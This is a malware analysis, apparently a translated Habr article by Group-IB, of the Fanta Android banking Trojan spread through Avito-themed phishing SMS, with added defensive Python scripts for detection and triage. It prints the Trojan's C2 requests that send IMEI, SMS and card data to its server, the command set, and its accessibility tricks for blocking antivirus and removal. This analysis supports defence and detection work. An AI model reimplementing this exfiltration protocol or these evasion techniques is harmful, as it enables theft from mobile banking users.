Leysya, Fanta: a new tactic of an old Android Trojan

One day you decide to sell something on Avito and, after posting a detailed description of your item (say, a RAM module), you receive the following message:

When you open the link, you see a harmless-looking page informing you, the happy and successful seller, that the purchase has been made.

As soon as you tap the "Continue" button, an APK file with a plausible icon and a trustworthy name is downloaded to your Android device. You install an application that, for some reason, asks for Accessibility Service rights; a couple of windows then appear and quickly disappear, and... that's it.

You go to check your balance, but for some reason your banking app asks for your card details again. After you enter them, something frightening happens: for reasons you cannot understand, money starts disappearing from your account. You try to deal with the problem, but your phone resists: it presses the Back and Home buttons by itself, refuses to turn off and does not let you take any protective measures. As a result, you are left without money, your item has not been sold, and you are left confused, asking: what just happened?

The answer is simple: you are a victim of the Fanta Android Trojan, a member of the Flexnet family. How did this happen? Let us explain.

Authors: Andrey Polovinkin, Malware Analyst; Ivan Pisarev, Malware Analyst.

Some background

The Flexnet family of Android Trojans was first reported in 2015. Over its long period of activity, the family has branched into many sub-species: Fanta, Limebot, Lipton and others. The Trojan, and the infrastructure associated with it, do not stand still: new, effective distribution schemes are developed (in our case, high-quality phishing pages aimed at a specific seller), and the Trojan's developers follow the fashions of virus writing, adding new functionality that makes it easier to steal money from infected devices and to bypass protection mechanisms.

The campaign described in this article targets users from Russia; a small number of infected devices were recorded in Ukraine, and even fewer in Kazakhstan and Belarus.

Although Flexnet has been in the Android Trojan arena for more than 4 years and has been studied in detail by many researchers, it is still in good shape. As of January 2019, the potential damage exceeds 35 million rubles, and that is only for campaigns in Russia. In 2015, various versions of this Android Trojan were sold on underground forums, where the Trojan's source code with a detailed description could also be found. This means that the worldwide damage figures are even more impressive. Not bad for such an old-timer, is it?

From a listing to a scam

As can be seen in the screenshot of the phishing page shown earlier, styled after the Avito online classifieds service, the page was prepared for a specific victim. Apparently, the attackers use one of the Avito parsers to extract the seller's phone number and name together with the item description. After preparing the page and the APK file, the victim is sent an SMS message containing their name and a link to the phishing page, which shows the description of their item and the amount received from the "sale". By clicking the button, the user receives the malicious APK file: Fanta.

Analysis of the shcet491[.]ru domain showed that it is delegated to Hostinger's DNS servers:

  • ns1.hostinger.ru
  • ns2.hostinger.ru
  • ns3.hostinger.ru
  • ns4.hostinger.ru

The domain's zone file contains records pointing to the IP addresses 31.220.23[.]236, 31.220.23[.]243 and 31.220.23[.]235. However, the domain's main resource record (A record) points to a server with the IP address 178.132.1[.]240.

The IP address 178.132.1[.]240 is located in the Netherlands and belongs to the hosting provider WorldStream. The IP addresses 31.220.23[.]235, 31.220.23[.]236 and 31.220.23[.]243 are located in the United Kingdom and belong to HOSTINGER's shared hosting servers. The registrar is openprov-ru. The following domains also resolved to the IP address 178.132.1[.]240:

  • sdelka-ru[.]ru
  • tovar-av[.]ru
  • av-tovar[.]ru
  • ru-sdelka[.]ru
  • shcet382[.]ru
  • sdelka221[.]ru
  • sdelka211[.]ru
  • vyplata437[.]ru
  • viplata291[.]ru
  • perevod273[.]ru
  • perevod901[.]ru

It should be noted that links of the following format were available on almost all of these domains:

http://(www.){0,1}<%domain%>/[0-9]{7}

The link from the SMS message also fits this template. According to historical data, many links following the pattern above were associated with a single domain, which indicates that one domain was used to distribute the Trojan to many victims.
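As an added example (not code from the original article), the template above can be turned into a check that a mail or SMS gateway filter, or an analyst triaging a reported message, can run over message text. It assumes the defanged domain list from this article (a subset of the domains given above); the defanging is only undone in memory for string comparison, and the sample SMS text is constructed.

```python
"""Match URLs in SMS text against the distribution-link template
http://(www.){0,1}<%domain%>/[0-9]{7} on the domains listed in the article."""
import re

# Subset of the defanged domains listed in the article
FANTA_DOMAINS_DEFANGED = [
    "shcet491[.]ru", "sdelka-ru[.]ru", "shcet382[.]ru", "sdelka221[.]ru",
    "sdelka211[.]ru", "vyplata437[.]ru", "viplata291[.]ru",
]

def refang(domain: str) -> str:
    # Only used to build the comparison regex; nothing is contacted
    return domain.replace("[.]", ".")

# Generic shape of the template (any host) used to pull candidates out of free text
URL_RE = re.compile(r"https?://[A-Za-z0-9.\-]+/[0-9]{7}\b")

def build_matchers(domains):
    """Compile one anchored regex per known domain from the article's template."""
    matchers = []
    for d in domains:
        host = re.escape(refang(d))
        matchers.append(re.compile(r"^http://(www\.)?%s/[0-9]{7}$" % host))
    return matchers

KNOWN = build_matchers(FANTA_DOMAINS_DEFANGED)

def is_fanta_link(url: str) -> bool:
    """True if the URL is exactly <scheme http>://[www.]<known domain>/<7 digits>."""
    return any(p.match(url) for p in KNOWN)

def find_suspicious_links(sms_text: str) -> list:
    """Return the URLs in an SMS body that match the template on a known domain."""
    return [u for u in URL_RE.findall(sms_text) if is_fanta_link(u)]

if __name__ == "__main__":
    # Constructed sample message; the digits and the second URL are arbitrary
    sample = ("Your item has been bought, payment details: "
              "http://www.shcet491.ru/1234567 pickup: https://example.org/9876543")
    print(find_suspicious_links(sample))
```

The per-domain regexes are anchored, so a link with a longer path, a different scheme or an extra subdomain does not match; widen the list or the pattern deliberately rather than loosening the anchors.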

Let us jump ahead a little: the Trojan downloaded from the link in the SMS uses the address onuseseddohap[.]club as its control server. This domain was registered on 2019-03-12, and APK applications have been interacting with it since 2019-04-29. Based on data obtained from VirusTotal, a total of 109 applications have interacted with this server. The domain itself resolves to the IP address 217.23.14[.]27, which is located in the Netherlands and belongs to the hoster WorldStream. The registrar is listed as name. The domains bad-racoon[.]club (since 2018-09-25) and bad-racoon[.]live (since 2018-10-25) also resolved to this IP address. More than 80 APK files interacted with the bad-racoon[.]club domain, and more than 100 with bad-racoon[.]live.

Overall, the attack proceeds as follows: the attackers prepare a phishing page for a specific seller, send the victim an SMS message with a link to it, the victim downloads and installs the APK from the page, and the Trojan registers with the control server and starts receiving commands.

What is under Fanta's hood?

Like many other Android Trojans, Fanta can read and send SMS messages, make USSD requests and display its own windows on top of other applications (including banking ones). However, the family's arsenal of functionality has grown: Fanta has started using the Accessibility Service for various purposes, such as reading the contents of other applications' notifications and preventing the Trojan from being detected and terminated on the infected device. Fanta runs on all Android versions from 4.4 upwards. In this article we take a closer look at the following Fanta sample:

  • MD5: 0826bd11b2c130c4c8ac137e395ac2d4
  • SHA1: ac33d38d486ee4859aa21b9aeba5e6e11404bcc8
  • SHA256: df57b7e7ac6913ea5f4daad319e02db1f4a6b243f2ea6500f83060648da6edfb

Immediately after launch

Immediately after launch, the Trojan hides its icon. The application only runs if the name of the infected device is not in the following list:

  • All Internet services
  • VirtualBox
  • Nexus 5X (bullhead)
  • Nexus 5 (hammerhead)

This check is performed in the Trojan's main service, MainService. On first launch, the application's configuration parameters are initialised with default values (the configuration storage format and the meaning of the values are discussed later), and the new infected device is registered with the control server. An HTTP POST request with the message type register_bot and information about the infected device (Android version, IMEI, phone number, operator name and the code of the country in which the operator is registered) is sent to the server. The address hXXp://onuseseddohap[.]club/controller.php is used as the control server. In response, the server sends a message containing the fields bot_id, bot_pwd and server; the application stores these values as the CnC server parameters. The server parameter is optional: if the field is not received, Fanta uses the registration address, hXXp://onuseseddohap[.]club/controller.php. The ability to change the CnC address can serve two purposes: distributing the load evenly between several servers (with a large number of infected devices, the load on an untuned web server can be high), and using a backup server in case one of the CnC servers fails.

If an error occurs while sending the request, the Trojan repeats the registration procedure after 20 seconds.

After the device has been successfully registered, Fanta shows the user a message about a service called System Security; this is the name of the Trojan's own service. After the user taps OK, a window with the infected device's accessibility settings opens, in which the user is expected to grant accessibility rights to the malicious service. Once the user enables the Accessibility Service, Fanta gains access to the contents of application windows and to the actions performed in them. Immediately after obtaining accessibility rights, the Trojan requests device administrator rights and the right to read notifications. Using the Accessibility Service, the application emulates keystrokes, thereby granting itself all the rights it needs.

Fanta creates several database instances (described later) that are needed to store configuration data and the information about the infected device collected during operation. To send the collected information, the Trojan creates a recurring task that unloads the fields from the database and fetches a command from the control server. The interval for contacting the CnC depends on the Android version: for 5.1 the interval is 10 seconds, otherwise 60 seconds.

To receive a command, Fanta makes a GetTask request to the control server. In response, the CnC may send one of the following commands:

Mode | Description
0 | Send an SMS message
1 | Make a phone call or USSD command
2 | Update the interval parameter
3 | Update the intercept parameter
6 | Update the smsManager parameter
9 | Start collecting SMS messages
11 | Reset the phone to factory settings
12 | Enable/disable logging of dialog window creation

Fanta also collects notifications from 70 banking, fast-payment and wallet applications and stores them in the database.

Storing configuration parameters

To store configuration parameters, Fanta uses the standard Android approach: Preferences files. The settings are saved in a file named settings. The stored parameters are described in the table below.

Name | Default value | Possible values | Description
id | 0 | Integer | Bot ID
server | hXXp://onuseseddohap[.]club/ | URL | Control server address
pwd | - | String | Server password
interval | 20 | Integer | Interval, in seconds. Specifies how long to delay the following tasks: sending a request about the status of a sent SMS message; fetching a new command from the control server
intercept | all | all/phone number | If the field equals the string all or a phone number, the received SMS message is intercepted by the application and not shown to the user
smsManager | 0 | 0/1 | Enable/disable the application as the default SMS handler
readDialog | false | true/false | Enable/disable logging of AccessibilityEvent events

Fanta also uses the file smsManager:

Name | Default value | Possible values | Description
pckg | - | String | Name of the SMS manager in use
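As an added example (not from the article), the following script reads the settings Preferences file described above as a responder would find it in a device image and reports the values that matter. It assumes the general Android layout of SharedPreferences files (an XML <map> under /data/data/<package>/shared_prefs/<name>.xml, with typed child elements); the Trojan's package name is not given in the article, and the XML shown is a constructed sample with the parameter names from the table.

```python
"""Parse a dumped SharedPreferences XML file and summarise Fanta's settings."""
import xml.etree.ElementTree as ET

# Constructed sample of a dumped settings.xml (assumed layout, made-up values)
SAMPLE_SETTINGS_XML = """<?xml version='1.0' encoding='utf-8' standalone='yes' ?>
<map>
    <int name="id" value="1001" />
    <string name="server">hXXp://onuseseddohap[.]club/</string>
    <string name="pwd">p4ss</string>
    <int name="interval" value="20" />
    <string name="intercept">all</string>
    <int name="smsManager" value="1" />
    <boolean name="readDialog" value="false" />
</map>
"""

# Default values from the table in the article
DEFAULTS = {"id": 0, "server": "hXXp://onuseseddohap[.]club/", "pwd": "",
            "interval": 20, "intercept": "all", "smsManager": 0, "readDialog": False}

def parse_shared_prefs(xml_text: str) -> dict:
    """Convert the typed <map> entries of a SharedPreferences file into Python values."""
    root = ET.fromstring(xml_text)
    prefs = {}
    for el in root:
        name = el.get("name")
        if el.tag == "string":
            prefs[name] = el.text or ""
        elif el.tag in ("int", "long"):
            prefs[name] = int(el.get("value"))
        elif el.tag == "boolean":
            prefs[name] = el.get("value") == "true"
        elif el.tag == "float":
            prefs[name] = float(el.get("value"))
    return prefs

def summarize(prefs: dict) -> dict:
    """Merge with the defaults and flag the settings a responder cares about."""
    cfg = dict(DEFAULTS, **prefs)
    findings = []
    if cfg["id"] != 0:
        findings.append("device registered with the control server (bot id %d)" % cfg["id"])
    if cfg["smsManager"] == 1:
        findings.append("Trojan set as the default SMS application")
    if cfg["intercept"] == "all":
        findings.append("all incoming SMS are hidden from the user")
    elif cfg["intercept"]:
        findings.append("SMS from %s are hidden from the user" % cfg["intercept"])
    if cfg["readDialog"]:
        findings.append("AccessibilityEvent logging enabled")
    return {"config": cfg, "findings": findings, "c2": cfg["server"]}

if __name__ == "__main__":
    result = summarize(parse_shared_prefs(SAMPLE_SETTINGS_XML))
    for line in result["findings"]:
        print("-", line)
```

Merging with the defaults matters because a key that was never written is absent from the file, and absence means the default (for example, intercept defaults to all even when the key is missing).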

Working with databases

The Trojan uses two databases during its operation. The database named a is used to store various information collected from the phone. The second database is named fanta.db and is used to store the settings that control the creation of the phishing windows designed to collect bank card information.

The Trojan uses database a to store the collected information and to log its actions. The data is stored in the table logs. The following SQL query is used to create the table:

create table logs ( _id integer primary key autoincrement, d TEXT, f TEXT, p TEXT, m integer)

The database contains the following information:

1. Logging of the infected device switching on, with the message Phone is on!

2. Notifications from applications. The message is built according to the following template:

(<%App Name%>)<%Title%>: <%Notification text%>

3. Bank card data from the phishing forms created by the Trojan. The VIEW_NAME parameter can be one of the following:

  • AliExpress
  • Avito
  • Google Play
  • Miscellaneous <%App Name%>

The message is written in the format:

[<%Time in format HH:mm:ss dd.MM.yyyy%>](<%VIEW_NAME%>) Номер карты:<%CARD_NUMBER%>; Дата:<%MONTH%>/<%YEAR%>; CVV: <%CVV%>

4. Incoming/outgoing SMS messages in the form:

([<%Time in format HH:mm:ss dd.MM.yyyy%>] Тип: Входящее/Исходящее) <%Mobile number%>:<%SMS-text%>

5. Information about the package that created a dialog window, in the form:

(<%Package name%>)<%Package information%>
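As an added example (not from the article), the five record formats above can be turned into a triage routine for a copy of database a recovered from an infected device. It creates the logs table with the schema given above, loads constructed sample rows (not data from a real device; the boot message is taken as the translated form shown on this page), classifies each row, and masks card numbers before anything is reported.

```python
"""Classify rows of Fanta's 'logs' table by the record formats in the article."""
import re
import sqlite3

CREATE_LOGS = ("create table logs ( _id integer primary key autoincrement, "
               "d TEXT, f TEXT, p TEXT, m integer)")

# Record formats from the article; the Cyrillic labels are part of the malware's own format
CARD_RE = re.compile(
    r"^\[(?P<time>[^\]]+)\]\((?P<view>[^)]+)\) Номер карты:(?P<pan>\d+); "
    r"Дата:(?P<month>\d+)/(?P<year>\d+); CVV: (?P<cvv>\d+)$")
SMS_RE = re.compile(
    r"^\(\[(?P<time>[^\]]+)\] Тип: (?P<dir>Входящее|Исходящее)\) (?P<number>[^:]+):(?P<text>.*)$",
    re.S)
NOTIF_RE = re.compile(r"^\((?P<app>[^)]+)\)(?P<title>[^:]*): (?P<text>.*)$", re.S)
PKG_RE = re.compile(r"^\((?P<pkg>[^)]+)\)(?P<info>.*)$", re.S)

def mask_pan(pan: str) -> str:
    """Keep only the last four digits of a card number."""
    return "*" * (len(pan) - 4) + pan[-4:]

def classify(d: str) -> dict:
    """Return a typed, redacted view of one value of column d."""
    if d == "Phone is on!":
        return {"type": "boot", "text": d}
    m = CARD_RE.match(d)
    if m:
        return {"type": "card", "view": m["view"], "pan": mask_pan(m["pan"]),
                "expiry": m["month"] + "/" + m["year"], "cvv": "***"}
    m = SMS_RE.match(d)
    if m:
        return {"type": "sms", "direction": "in" if m["dir"] == "Входящее" else "out",
                "number": m["number"], "text": m["text"]}
    m = NOTIF_RE.match(d)
    if m:
        return {"type": "notification", "app": m["app"], "title": m["title"], "text": m["text"]}
    m = PKG_RE.match(d)
    if m:
        return {"type": "package", "pkg": m["pkg"], "info": m["info"]}
    return {"type": "unknown", "text": d}

def triage(db_path=":memory:") -> list:
    """Create the table, load constructed rows and classify every record in order."""
    con = sqlite3.connect(db_path)
    con.execute(CREATE_LOGS)
    samples = [  # constructed, one per record format
        "Phone is on!",
        "(Example Bank)Payment: 1000 RUB withdrawn",
        "[12:00:00 01.05.2019](Avito) Номер карты:4111111111111111; Дата:12/22; CVV: 123",
        "([12:01:00 01.05.2019] Тип: Входящее) +70000000000:Your code is 4321",
        "(com.example.app)Example App 1.0",
    ]
    con.executemany("insert into logs (d, f, p, m) values (?, ?, ?, ?)",
                    [(s, "", "", 0) for s in samples])
    return [classify(row[0]) for row in con.execute("select d from logs order by _id")]

if __name__ == "__main__":
    for rec in triage():
        print(rec)
```

The order of the checks is deliberate: the card and SMS formats are tried before the generic notification and package formats, because the latter two would also match them.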

One of Fanta's functions is the collection of bank card information. The data is collected by creating phishing windows when banking applications are opened. The Trojan creates each phishing window only once. The information about which windows have been shown to the user is stored in the table settings in the database fanta.db. The following SQL query is used to create the table:

create table settings (can_login integer, first_bank integer, can_alpha integer, can_avito integer, can_ali integer, can_vtb24 integer, can_telecard integer, can_another integer, can_card integer);

All fields of the settings table are initialised to 1 (create the phishing window) by default. After the user has entered their data, the value is set to 0. Examples of the settings table fields:

  • can_login: the field responsible for showing the form when a banking application is opened
  • first_bank: not used
  • can_avito: the field responsible for showing the form when the Avito application is opened
  • can_ali: the field responsible for showing the form when the AliExpress application is opened
  • can_another: the field responsible for showing the form when any application from the following list is opened: Yula, Pandao, Drom Auto, Wallet. Discount and bonus cards, Aviasales, Booking, Trivago
  • can_card: the field responsible for showing the form when Google Play is opened

Interaction with the control server

Network communication with the control server takes place over HTTP. Fanta uses the popular Retrofit library for networking. Requests are sent to hXXp://onuseseddohap[.]club/controller.php. The server address can be changed during registration with the server. A cookie may be returned by the server. Fanta makes the following requests to the server:

  • Registration of the bot with the control server takes place once, on first launch. The following data about the infected device is sent to the server:
    · Cookies: cookies received from the server (the value is always an empty list)
    · mode: the constant string register_bot
    · prefix: the integer 2
    · version_sdk: built according to the following template: <%Build.MODEL%>/<%Build.VERSION.RELEASE%>(Avit)
    · imei: IMEI of the infected device
    · country: the code of the country in which the operator is registered, in ISO format
    · number: phone number
    · operator: operator name

    Example of a request sent to the server:

    POST /controller.php HTTP/1.1
    Cookie:
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 144
    Host: onuseseddohap.club
    Connection: close
    Accept-Encoding: gzip, deflate
    User-Agent: okhttp/3.6.0
    
    mode=register_bot&prefix=2&version_sdk=<%VERSION_SDK%>&imei=<%IMEI%>&country=<%COUNTRY_ISO%>&number=<%TEL_NUMBER%>&operator=<%OPERATOR_NAME%>
    

    In response to the request, the server must return a JSON object containing the following parameters:
    bot_id: the identifier of the infected device. If bot_id equals 0, Fanta repeats the request.
    bot_pwd: the password for the server.
    server: the address of the control server. This parameter is optional. If it is not specified, the address stored in the application is used.

    Example of the JSON object:

    {
        "response":[
       	 {
       		 "bot_id": <%BOT_ID%>,
       		 "bot_pwd": <%BOT_PWD%>,
       		 "server": <%SERVER%>
       	 }
        ],
        "status":"ok"
    }

  • Request to obtain a command from the server. The following data is sent to the server:
    · Cookies: cookies received from the server
    · bid: the id of the infected device, obtained when the register_bot request was sent
    · pwd: the server password
    · divice_admin: indicates whether device administrator rights have been obtained. If they have, the field equals 1, otherwise 0
    · Accessibility: the state of the Accessibility Service. If the service has been started, the value is 1, otherwise 0
    · SMSManager: indicates whether the Trojan is enabled as the default SMS application
    · screen: indicates the state of the screen. The value is set to 1 if the screen is on, otherwise 0

    Example of a request sent to the server:

    POST /controller.php HTTP/1.1
    Cookie:
    Content-Type: application/x-www-form-urlencoded
    Host: onuseseddohap.club
    Connection: close
    Accept-Encoding: gzip, deflate
    User-Agent: okhttp/3.6.0
    
    mode=getTask&bid=<%BID%>&pwd=<%PWD%>&divice_admin=<%DEV_ADM%>&Accessibility=<%ACCSBL%>&SMSManager=<%SMSMNG%>&screen=<%SCRN%>

    Depending on the command, the server may return a JSON object with different parameters:

    · Command Send an SMS message: the parameters contain the phone number, the text of the SMS message and the identifier of the message to be sent. The identifier is used when sending a message of the setSmsStatus type to the server.

    {
        "response":
        [
       	 {
       		 "mode": 0,
       		 "sms_number": <%SMS_NUMBER%>,
       		 "sms_text": <%SMS_TEXT%>,
       		 "sms_id": %SMS_ID%
       	 }
        ],
        "status":"ok"
    }

    · Command Make a phone call or USSD command: the phone number or the command arrives in the body of the response.

    {
        "response":
        [
       	 {
       		 "mode": 1,
       		 "command": <%TEL_NUMBER%>
       	 }
        ],
        "status":"ok"
    }

    · Command Change the interval parameter.

    {
        "response":
        [
       	 {
       		 "mode": 2,
       		 "interval": <%SECONDS%>
       	 }
        ],
        "status":"ok"
    }

    · Command Change the intercept parameter.

    {
        "response":
        [
       	 {
       		 "mode": 3,
       		 "intercept": "all"/"telNumber"/<%ANY_STRING%>
       	 }
        ],
        "status":"ok"
    }

    · Command Change the SmsManager setting.

    {
        "response":
        [
       	 {
       		 "mode": 6,
       		 "enable": 0/1
       	 }
        ],
        "status":"ok"
    }

    · Command Collect SMS messages from the infected device.

    {
        "response":
        [
       	 {
       		 "mode": 9
       	 }
        ],
        "status":"ok"
    }

    · Command Reset the phone to factory settings:

    {
        "response":
        [
       	 {
       		 "mode": 11
       	 }
        ],
        "status":"ok"
    }

    · Command Change the ReadDialog setting.

    {
        "response":
        [
       	 {
       		 "mode": 12,
       		 "enable": 0/1
       	 }
        ],
        "status":"ok"
    }

  • Sending a message of the setSmsStatus type. This request is made after the Send an SMS message command has been executed. The request looks like this:

POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0

mode=setSmsStatus&id=<%ID%>&status_sms=<%PWD%>

  • Uploading the contents of the database. One row is sent per request. The following data is sent to the server:
    · Cookies: cookies received from the server
    · mode: the constant string setSaveInboxSms
    · bid: the id of the infected device, obtained when the register_bot request was sent
    · text: the text of the current data record (field d of table logs in database a)
    · number: the name of the current data record (field p of table logs in database a)
    · sms_mode: an integer value (field m of table logs in database a)

    The request looks like this:

    POST /controller.php HTTP/1.1
    Cookie:
    Content-Type: application/x-www-form-urlencoded
    Host: onuseseddohap.club
    Connection: close
    Accept-Encoding: gzip, deflate
    User-Agent: okhttp/3.6.0
    
    mode=setSaveInboxSms&bid=<%APP_ID%>&text=<%a.logs.d%>&number=<%a.logs.p%>&sms_mode=<%a.logs.m%>

    After a successful upload to the server, the row is deleted from the table. Example of the JSON object returned by the server:

    {
        "response":[],
        "status":"ok"
    }
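As an added example (not code from the article or from the Trojan), the request and response formats documented above can be parsed from proxy logs or a PCAP export to confirm that traffic belongs to this family and to read which commands a device was given. The field names, the mode values and the User-Agent come from the requests shown above; the sample bodies are constructed from those templates with made-up placeholder values, and the beacon heuristic (okhttp User-Agent plus a body whose mode and fields match one of the four request types) is an assumption made here, not a signature from the article.

```python
"""Parse Fanta C2 request bodies and GetTask JSON responses as documented above."""
import json
from urllib.parse import parse_qs

# Command codes from the GetTask table in the article
TASK_MODES = {
    0: "send SMS message",
    1: "make phone call / USSD command",
    2: "update interval parameter",
    3: "update intercept parameter",
    6: "update smsManager parameter",
    9: "start collecting SMS messages",
    11: "reset phone to factory settings",
    12: "toggle dialog-creation logging",
}

# Request modes and the fields each carries; 'divice_admin' is the malware's own misspelling
REQUEST_FIELDS = {
    "register_bot": {"prefix", "version_sdk", "imei", "country", "number", "operator"},
    "getTask": {"bid", "pwd", "divice_admin", "Accessibility", "SMSManager", "screen"},
    "setSmsStatus": {"id", "status_sms"},
    "setSaveInboxSms": {"bid", "text", "number", "sms_mode"},
}

def parse_request(body: str) -> dict:
    """Decode a form-encoded POST body into {'mode', 'fields', 'matches'}."""
    fields = {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}
    mode = fields.pop("mode", None)
    expected = REQUEST_FIELDS.get(mode)
    matches = expected is not None and expected <= set(fields)
    return {"mode": mode, "fields": fields, "matches": matches}

def parse_tasks(json_text: str) -> list:
    """Map each entry of a GetTask response to a readable command and its arguments."""
    doc = json.loads(json_text)
    tasks = []
    for item in doc.get("response", []):
        code = item.get("mode")
        name = TASK_MODES.get(code, "unknown mode %r" % (code,))
        args = {k: v for k, v in item.items() if k != "mode"}
        tasks.append({"code": code, "command": name, "args": args})
    return tasks

def is_fanta_beacon(headers: dict, body: str) -> bool:
    """Heuristic (assumed here): okhttp User-Agent and a body matching a known request type."""
    ua = headers.get("User-Agent", "")
    return ua.startswith("okhttp/") and parse_request(body)["matches"]

if __name__ == "__main__":
    # Constructed samples with placeholder values, not real device data
    beacon = ("mode=getTask&bid=1001&pwd=p4ss&divice_admin=1"
              "&Accessibility=1&SMSManager=0&screen=1")
    print(parse_request(beacon))
    task = ('{"response":[{"mode":0,"sms_number":"+70000000000",'
            '"sms_text":"hello","sms_id":7}],"status":"ok"}')
    for t in parse_tasks(task):
        print(t["code"], t["command"], t["args"])
```

The misspelled divice_admin parameter and the constant okhttp/3.6.0 User-Agent are cheap indicators on their own; requiring the full field set for the mode keeps unrelated okhttp traffic that happens to post a mode parameter from being flagged.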

Interaction with the Accessibility Service

The Accessibility Service was implemented to make Android devices easier to use for people with disabilities. In most cases, physical interaction is required to work with an application; AccessibilityService allows this to be done programmatically. Fanta uses the service to create fake windows on top of banking applications and to prevent the user from opening the system settings and certain other applications.

Using the Accessibility Service functionality, the Trojan monitors changes to the elements on the screen of the infected device. As described earlier, Fanta's settings contain a parameter responsible for logging activity with dialog windows: readDialog. If this option is set, information about the name and description of the package that generated the event is added to the database. The Trojan performs the following actions while the Accessibility Service is running:

  • Emulates the Back and Home keys:
    · if the user tries to reboot the device
    · if the user tries to delete the "Avito" application or change its access rights
    · if the "Avito" application is mentioned on the page
    · when the "Google Play Protect" application is opened
    · when pages with the Accessibility Service settings are opened
    · when a "Security" dialog appears
    · when the page with the "Draw over other apps" setting is opened
    · when the pages "Applications", "Backup and reset", "Data reset", "Reset settings", "Developer panel", "Spec. features", "Accessibility", "Special rights" are opened
    · if the event was generated by certain applications.

    List of applications

    • Android
    • Clean Master Lite
    • Clean Master
    • Clean Master for x86 CPU
    • Meizu Application Permission Management
    • MIUI Security
    • Clean Master - Antivirus & Cache & Junk Cleaner
    • Parental control and GPS: Kaspersky SafeKids
    • Kaspersky Antivirus AppLock & Web Security Beta
    • Virus Cleaner, Antivirus, Cleaner (MAX Security)
    • Mobile AntiVirus Security PRO
    • Avast antivirus & free protection 2019
    • MegaFon Mobile Security
    • AVG Protection for Xperia
    • Mobile Security
    • Malwarebytes antivirus & protection
    • Antivirus for Android 2019
    • Security Master - Antivirus, VPN, AppLock, Booster
    • AVG antivirus for Huawei tablet System Manager
    • Samsung Accessibility
    • Samsung Smart Manager
    • Security Manager
    • Speed Up
    • Dr.Web
    • Dr.Web Security Space
    • Dr.Web Mobile Control Centre
    • Dr.Web Security Space Life
    • Dr.Web Mobile Control Centre
    • Antivirus & Mobile Security
    • Kaspersky Internet Security: Antivirus and Protection
    • Kaspersky Battery Life: Saver & Booster
    • Kaspersky Endpoint Security - protection and management
    • AVG Antivirus Free 2019 - Android Protection
    • Antivirus Android
    • Norton Mobile Security and Antivirus
    • Antivirus, firewall, VPN, mobile security
    • Mobile Security: Antivirus, VPN, Anti-theft
    • Antivirus for Android

  • If permission is requested when sending an SMS message to a short number, Fanta emulates ticking the Remember choice checkbox and tapping the Send button.
  • When an attempt is made to revoke the Trojan's device administrator rights, it locks the phone screen.
  • It prevents new device administrators from being added.
  • If the Dr.Web antivirus application detects a threat, Fanta emulates tapping the Ignore button.
  • The Trojan emulates tapping the Back and Home buttons if the event was generated by the Samsung Device Care application.
  • Fanta creates phishing windows with forms for entering bank card information if an application from a list of about 30 different Internet services is launched. Among them: AliExpress, Booking, Avito, Google Play Market component, Pandao, Drom Auto and others.
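Because the Trojan closes the Accessibility settings pages as soon as they open (see the list above), the enabled accessibility services are easier to review from a connected workstation than on the device itself. As an added example (not from the article), the function below parses the value of the enabled_accessibility_services secure setting, which on Android is a colon-separated list of <package>/<service class> entries (as printed by adb shell settings get secure enabled_accessibility_services), and reports the services not on an allowlist. The sample value and the allowlist are constructed; a real allowlist has to be built for the devices being examined.

```python
"""Review enabled Android accessibility services against an allowlist."""

# Constructed sample of the setting's value (not from a real device); the second
# entry is a made-up package standing in for an unexpected service
SAMPLE_SETTING = ("com.android.talkback/com.google.android.marvin.talkback.TalkBackService:"
                  "com.example.systemsecurity/.AccessService")

# Services vetted as legitimate for this fleet (assumed)
ALLOWLIST = {
    "com.android.talkback/com.google.android.marvin.talkback.TalkBackService",
}

def parse_enabled_services(value: str) -> list:
    """Split the setting into (package, fully qualified service class) pairs."""
    services = []
    for entry in filter(None, value.strip().split(":")):
        pkg, _, cls = entry.partition("/")
        if cls.startswith("."):
            cls = pkg + cls  # Android shorthand for a class inside the package
        services.append((pkg, cls))
    return services

def review(value: str, allowlist=ALLOWLIST) -> dict:
    """Return the enabled services that are not on the allowlist."""
    services = parse_enabled_services(value)
    flagged = []
    for pkg, cls in services:
        full = pkg + "/" + cls
        # Also accept allowlist entries written in the shorthand form
        short = pkg + "/" + cls[len(pkg):] if cls.startswith(pkg + ".") else full
        if full not in allowlist and short not in allowlist:
            flagged.append({"package": pkg, "service": cls})
    return {"total": len(services), "flagged": flagged}

if __name__ == "__main__":
    result = review(SAMPLE_SETTING)
    print("%d enabled, %d flagged" % (result["total"], len(result["flagged"])))
    for item in result["flagged"]:
        print("-", item["package"], item["service"])
```

A flagged entry is a lead, not a verdict: the next step is to pull the APK for that package (for example with adb pull) and check its hashes against the ones listed for this sample.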

Phishing forms

Fanta analyses which applications are running on the infected device. If an application of interest is opened, the Trojan shows a phishing window on top of all others: a form for entering bank card information. The user is asked to enter the following data:

  • Card number
  • Card expiry date
  • CVV
  • Cardholder name (not for all banks)

Depending on the active application, different phishing windows are shown. The original article shows screenshots of the windows for AliExpress and for Avito, and of the generic window used for other applications such as Google Play Market, Aviasales, Pandao, Booking and Trivago.

How it actually happened

Fortunately, the person who received the SMS message described at the beginning of this article turned out to be a cybersecurity specialist. So the real, non-fictional version differs from the one told earlier: the person received an interesting SMS and passed it on to the Group-IB Threat Hunting Intelligence team. The result of the analysis is this article. A happy ending, isn't it? However, not all stories end so well, and so that yours does not turn out like the fictional one, with the loss of money, in most cases it is enough to follow the long-established rules below:

  • do not install applications on your Android mobile device from any source other than Google Play
  • when installing an application, pay special attention to the permissions it requests
  • pay attention to the extensions of downloaded files
  • install Android OS updates regularly
  • do not visit suspicious resources and do not download files from them
  • do not follow links received in SMS messages.

Source: www.habr.com
